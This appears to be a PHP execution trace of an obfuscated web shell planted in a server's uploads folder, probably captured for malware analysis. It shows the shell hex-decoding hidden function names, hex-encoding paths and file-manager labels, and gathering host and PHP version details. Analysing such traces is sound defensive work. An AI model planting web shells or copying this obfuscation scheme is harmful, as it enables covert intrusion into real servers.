2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 349 1 0.014078 480928
2 349 R 'htmlspecialchars'
1 A /var/www/html/uploads/shell.php 8 $fc[18] = 'htmlspecialchars'
1 A /var/www/html/uploads/shell.php 7 $i++
2 382 0 0.014161 480928 nhx 1 /var/www/html/uploads/shell.php 8 1 '64617465'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 7
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 383 0 0.014203 480960 hexdec 0 /var/www/html/uploads/shell.php 27 1 '64'
3 383 1 0.014215 481008
3 383 R 100
3 384 0 0.014226 480928 chr 0 /var/www/html/uploads/shell.php 27 1 100
3 384 1 0.014238 480968
3 384 R 'd'
2 A /var/www/html/uploads/shell.php 27 $r .= 'd'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 385 0 0.014267 480992 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 385 1 0.014279 481040
3 385 R 97
3 386 0 0.014291 480960 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 386 1 0.014302 481000
3 386 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 387 0 0.014331 480992 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 387 1 0.014343 481040
3 387 R 116
3 388 0 0.014354 480960 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 388 1 0.014365 481000
3 388 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 389 0 0.014395 480992 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 389 1 0.014407 481040
3 389 R 101
3 390 0 0.014419 480960 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 390 1 0.014430 481000
3 390 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 382 1 0.014459 480960
2 382 R 'date'
1 A /var/www/html/uploads/shell.php 8 $fc[19] = 'date'
1 A /var/www/html/uploads/shell.php 7 $i++
2 391 0 0.014491 480960 nhx 1 /var/www/html/uploads/shell.php 8 1 '66696c656d74696d65'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 17
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 392 0 0.014531 480992 hexdec 0 /var/www/html/uploads/shell.php 27 1 '66'
3 392 1 0.014542 481040
3 392 R 102
3 393 0 0.014554 480960 chr 0 /var/www/html/uploads/shell.php 27 1 102
3 393 1 0.014565 481000
3 393 R 'f'
2 A /var/www/html/uploads/shell.php 27 $r .= 'f'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 394 0 0.014595 481024 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 394 1 0.014607 481072
3 394 R 105
3 395 0 0.014619 480992 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 395 1 0.014630 481032
3 395 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 396 0 0.014660 481024 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 396 1 0.014671 481072
3 396 R 108
3 397 0 0.014683 480992 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 397 1 0.014695 481032
3 397 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 398 0 0.014724 481024 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 398 1 0.014736 481072
3 398 R 101
3 399 0 0.014748 480992 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 399 1 0.014759 481032
3 399 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 400 0 0.014787 481024 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6d'
3 400 1 0.014799 481072
3 400 R 109
3 401 0 0.014811 480992 chr 0 /var/www/html/uploads/shell.php 27 1 109
3 401 1 0.014822 481032
3 401 R 'm'
2 A /var/www/html/uploads/shell.php 27 $r .= 'm'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 402 0 0.014850 481024 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 402 1 0.014865 481072
3 402 R 116
3 403 0 0.014877 480992 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 403 1 0.014888 481032
3 403 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 404 0 0.014917 481024 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 404 1 0.014929 481072
3 404 R 105
3 405 0 0.014941 480992 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 405 1 0.014952 481032
3 405 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 406 0 0.014980 481024 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6d'
3 406 1 0.014992 481072
3 406 R 109
3 407 0 0.015004 480992 chr 0 /var/www/html/uploads/shell.php 27 1 109
3 407 1 0.015015 481032
3 407 R 'm'
2 A /var/www/html/uploads/shell.php 27 $r .= 'm'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 408 0 0.015045 481032 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 408 1 0.015057 481080
3 408 R 101
3 409 0 0.015069 481000 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 409 1 0.015080 481040
3 409 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 391 1 0.015109 481000
2 391 R 'filemtime'
1 A /var/www/html/uploads/shell.php 8 $fc[20] = 'filemtime'
1 A /var/www/html/uploads/shell.php 7 $i++
2 410 0 0.015146 481000 getcwd 0 /var/www/html/uploads/shell.php 14 0
2 410 1 0.015162 481048
2 410 R '/var/www/html/uploads'
1 A /var/www/html/uploads/shell.php 14 $p = '/var/www/html/uploads'
2 411 0 0.015192 481048 phpversion 0 /var/www/html/uploads/shell.php 79 0
2 411 1 0.015205 481112
2 411 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 412 0 0.015221 481048 hex 1 /var/www/html/uploads/shell.php 79 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 413 0 0.015260 481048 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 413 1 0.015273 481088
3 413 R 47
3 414 0 0.015285 481048 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 414 1 0.015296 481120
3 414 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 415 0 0.015327 481080 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 415 1 0.015378 481120
3 415 R 118
3 416 0 0.015392 481080 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 416 1 0.015403 481152
3 416 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 417 0 0.015434 481080 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 417 1 0.015446 481120
3 417 R 97
3 418 0 0.015458 481080 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 418 1 0.015469 481152
3 418 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 419 0 0.015499 481080 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 419 1 0.015510 481120
3 419 R 114
3 420 0 0.015522 481080 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 420 1 0.015533 481152
3 420 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 421 0 0.015563 481088 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 421 1 0.015574 481128
3 421 R 47
3 422 0 0.015586 481088 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 422 1 0.015598 481160
3 422 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 423 0 0.015627 481088 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 423 1 0.015638 481128
3 423 R 119
3 424 0 0.015650 481088 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 424 1 0.015667 481160
3 424 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 425 0 0.015697 481088 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 425 1 0.015708 481128
3 425 R 119
3 426 0 0.015720 481088 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 426 1 0.015731 481160
3 426 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 427 0 0.015760 481088 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 427 1 0.015771 481128
3 427 R 119
3 428 0 0.015784 481088 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 428 1 0.015795 481160
3 428 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 429 0 0.015823 481096 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 429 1 0.015834 481136
3 429 R 47
3 430 0 0.015846 481096 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 430 1 0.015858 481168
3 430 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 431 0 0.015886 481096 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 431 1 0.015897 481136
3 431 R 104
3 432 0 0.015909 481096 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 432 1 0.015920 481168
3 432 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 433 0 0.015949 481096 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 433 1 0.015960 481136
3 433 R 116
3 434 0 0.015972 481096 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 434 1 0.015983 481168
3 434 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 435 0 0.016012 481096 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 435 1 0.016023 481136
3 435 R 109
3 436 0 0.016035 481096 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 436 1 0.016046 481168
3 436 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 437 0 0.016075 481104 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 437 1 0.016086 481144
3 437 R 108
3 438 0 0.016098 481104 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 438 1 0.016109 481176
3 438 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 439 0 0.016138 481104 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 439 1 0.016149 481144
3 439 R 47
3 440 0 0.016161 481104 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 440 1 0.016173 481176
3 440 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 441 0 0.016201 481104 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 441 1 0.016212 481144
3 441 R 117
3 442 0 0.016224 481104 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 442 1 0.016236 481176
3 442 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 443 0 0.016264 481104 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 443 1 0.016275 481144
3 443 R 112
3 444 0 0.016288 481104 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 444 1 0.016299 481176
3 444 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 445 0 0.016328 481112 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 445 1 0.016339 481152
3 445 R 108
3 446 0 0.016351 481112 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 446 1 0.016362 481184
3 446 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 447 0 0.016393 481112 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 447 1 0.016404 481152
3 447 R 111
3 448 0 0.016416 481112 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 448 1 0.016427 481184
3 448 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 449 0 0.016456 481112 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 449 1 0.016467 481152
3 449 R 97
3 450 0 0.016479 481112 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 450 1 0.016490 481184
3 450 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 451 0 0.016519 481112 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 451 1 0.016531 481152
3 451 R 100
3 452 0 0.016543 481112 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 452 1 0.016554 481184
3 452 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 453 0 0.016582 481128 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 453 1 0.016594 481168
3 453 R 115
3 454 0 0.016606 481128 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 454 1 0.016617 481200
3 454 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 412 1 0.016646 481128
2 412 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 455 0 0.016663 481128 hex 1 /var/www/html/uploads/shell.php 79 1 'newFile'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 456 0 0.016693 481128 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 456 1 0.016705 481168
3 456 R 110
3 457 0 0.016717 481128 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 457 1 0.016728 481200
3 457 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 458 0 0.016757 481160 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 458 1 0.016769 481200
3 458 R 101
3 459 0 0.016781 481160 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 459 1 0.016793 481232
3 459 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 460 0 0.016822 481160 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 460 1 0.016834 481200
3 460 R 119
3 461 0 0.016846 481160 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 461 1 0.016858 481232
3 461 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 462 0 0.016888 481160 ord 0 /var/www/html/uploads/shell.php 19 1 'F'
3 462 1 0.016899 481200
3 462 R 70
3 463 0 0.016911 481160 dechex 0 /var/www/html/uploads/shell.php 19 1 70
3 463 1 0.016922 481232
3 463 R '46'
2 A /var/www/html/uploads/shell.php 19 $r .= '46'
2 A /var/www/html/uploads/shell.php 18 $i++
3 464 0 0.016951 481168 ord 0 /var/www/html/uploads/shell.php 19 1 'i'
3 464 1 0.016963 481208
3 464 R 105
3 465 0 0.016975 481168 dechex 0 /var/www/html/uploads/shell.php 19 1 105
3 465 1 0.016987 481240
3 465 R '69'
2 A /var/www/html/uploads/shell.php 19 $r .= '69'
2 A /var/www/html/uploads/shell.php 18 $i++
3 466 0 0.017016 481168 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 466 1 0.017027 481208
3 466 R 108
3 467 0 0.017040 481168 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 467 1 0.017051 481240
3 467 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 468 0 0.017080 481168 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 468 1 0.017095 481208
3 468 R 101
3 469 0 0.017108 481168 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 469 1 0.017119 481240
3 469 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
2 455 1 0.017149 481168
2 455 R '6e657746696c65'
2 470 0 0.017164 481048 hex 1 /var/www/html/uploads/shell.php 79 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 471 0 0.017194 481048 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 471 1 0.017205 481088
3 471 R 47
3 472 0 0.017217 481048 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 472 1 0.017228 481120
3 472 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 473 0 0.017258 481080 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 473 1 0.017270 481120
3 473 R 118
3 474 0 0.017282 481080 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 474 1 0.017293 481152
3 474 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 475 0 0.017355 481080 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 475 1 0.017367 481120
3 475 R 97
3 476 0 0.017380 481080 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 476 1 0.017391 481152
3 476 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 477 0 0.017421 481080 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 477 1 0.017432 481120
3 477 R 114
3 478 0 0.017444 481080 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 478 1 0.017455 481152
3 478 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 479 0 0.017483 481088 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 479 1 0.017494 481128
3 479 R 47
3 480 0 0.017506 481088 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 480 1 0.017518 481160
3 480 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 481 0 0.017547 481088 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 481 1 0.017558 481128
3 481 R 119
3 482 0 0.017571 481088 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 482 1 0.017582 481160
3 482 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 483 0 0.017612 481088 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 483 1 0.017623 481128
3 483 R 119
3 484 0 0.017635 481088 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 484 1 0.017647 481160
3 484 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 485 0 0.017675 481088 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 485 1 0.017686 481128
3 485 R 119
3 486 0 0.017699 481088 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 486 1 0.017710 481160
3 486 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 487 0 0.017739 481096 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 487 1 0.017750 481136
3 487 R 47
3 488 0 0.017762 481096 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 488 1 0.017774 481168
3 488 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 489 0 0.017802 481096 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 489 1 0.017813 481136
3 489 R 104
3 490 0 0.017826 481096 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 490 1 0.017837 481168
3 490 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 491 0 0.017871 481096 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 491 1 0.017882 481136
3 491 R 116
3 492 0 0.017895 481096 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 492 1 0.017906 481168
3 492 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 493 0 0.017935 481096 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 493 1 0.017946 481136
3 493 R 109
3 494 0 0.017958 481096 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 494 1 0.017969 481168
3 494 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 495 0 0.017998 481104 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 495 1 0.018009 481144
3 495 R 108
3 496 0 0.018021 481104 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 496 1 0.018032 481176
3 496 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 497 0 0.018061 481104 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 497 1 0.018072 481144
3 497 R 47
3 498 0 0.018083 481104 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 498 1 0.018094 481176
3 498 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 499 0 0.018123 481104 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 499 1 0.018134 481144
3 499 R 117
3 500 0 0.018146 481104 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 500 1 0.018157 481176
3 500 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 501 0 0.018186 481104 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 501 1 0.018196 481144
3 501 R 112
3 502 0 0.018208 481104 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 502 1 0.018219 481176
3 502 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 503 0 0.018248 481112 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 503 1 0.018259 481152
3 503 R 108
3 504 0 0.018271 481112 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 504 1 0.018282 481184
3 504 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 505 0 0.018310 481112 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 505 1 0.018321 481152
3 505 R 111
3 506 0 0.018333 481112 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 506 1 0.018344 481184
3 506 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 507 0 0.018372 481112 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 507 1 0.018383 481152
3 507 R 97
3 508 0 0.018395 481112 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 508 1 0.018406 481184
3 508 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 509 0 0.018445 481112 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 509 1 0.018457 481152
3 509 R 100
3 510 0 0.018469 481112 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 510 1 0.018480 481184
3 510 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 511 0 0.018509 481128 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 511 1 0.018520 481168
3 511 R 115
3 512 0 0.018532 481128 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 512 1 0.018543 481200
3 512 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 470 1 0.018571 481128
2 470 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 513 0 0.018592 481128 hex 1 /var/www/html/uploads/shell.php 79 1 'newDir'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 514 0 0.018622 481128 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 514 1 0.018634 481168
3 514 R 110
3 515 0 0.018646 481128 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 515 1 0.018657 481200
3 515 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 516 0 0.018687 481160 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 516 1 0.018698 481200
3 516 R 101
3 517 0 0.018710 481160 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 517 1 0.018721 481232
3 517 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 518 0 0.018750 481160 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 518 1 0.018761 481200
3 518 R 119
3 519 0 0.018773 481160 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 519 1 0.018784 481232
3 519 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 520 0 0.018813 481160 ord 0 /var/www/html/uploads/shell.php 19 1 'D'
3 520 1 0.018823 481200
3 520 R 68
3 521 0 0.018836 481160 dechex 0 /var/www/html/uploads/shell.php 19 1 68
3 521 1 0.018847 481232
3 521 R '44'
2 A /var/www/html/uploads/shell.php 19 $r .= '44'
2 A /var/www/html/uploads/shell.php 18 $i++
3 522 0 0.018875 481168 ord 0 /var/www/html/uploads/shell.php 19 1 'i'
3 522 1 0.018887 481208
3 522 R 105
3 523 0 0.018898 481168 dechex 0 /var/www/html/uploads/shell.php 19 1 105
3 523 1 0.018909 481240
3 523 R '69'
2 A /var/www/html/uploads/shell.php 19 $r .= '69'
2 A /var/www/html/uploads/shell.php 18 $i++
3 524 0 0.018938 481168 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 524 1 0.018949 481208
3 524 R 114
3 525 0 0.018961 481168 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 525 1 0.018972 481240
3 525 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
2 513 1 0.019000 481168
2 513 R '6e6577446972'
2 526 0 0.019016 481048 php_uname 0 /var/www/html/uploads/shell.php 79 0
2 526 1 0.019030 481160
2 526 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 527 0 0.019052 481048 preg_split 0 /var/www/html/uploads/shell.php 100 2 '/(\\\\|\\/)/' '/var/www/html/uploads'
2 527 1 0.019098 481648
2 527 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/shell.php 100 $ps = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/shell.php 101 $k = 0
1 A /var/www/html/uploads/shell.php 101 $k = 1
1 A /var/www/html/uploads/shell.php 107 $i = 0
2 528 0 0.019163 481584 hex 1 /var/www/html/uploads/shell.php 108 1 ''
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
2 528 1 0.019193 481584
2 528 R ''
1 A /var/www/html/uploads/shell.php 107 $i++
2 529 0 0.019214 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'var'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 530 0 0.019249 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 530 1 0.019262 481624
3 530 R 118
3 531 0 0.019275 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 531 1 0.019286 481656
3 531 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 532 0 0.019317 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 532 1 0.019328 481656
3 532 R 97
3 533 0 0.019340 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 533 1 0.019356 481688
3 533 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 534 0 0.019386 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
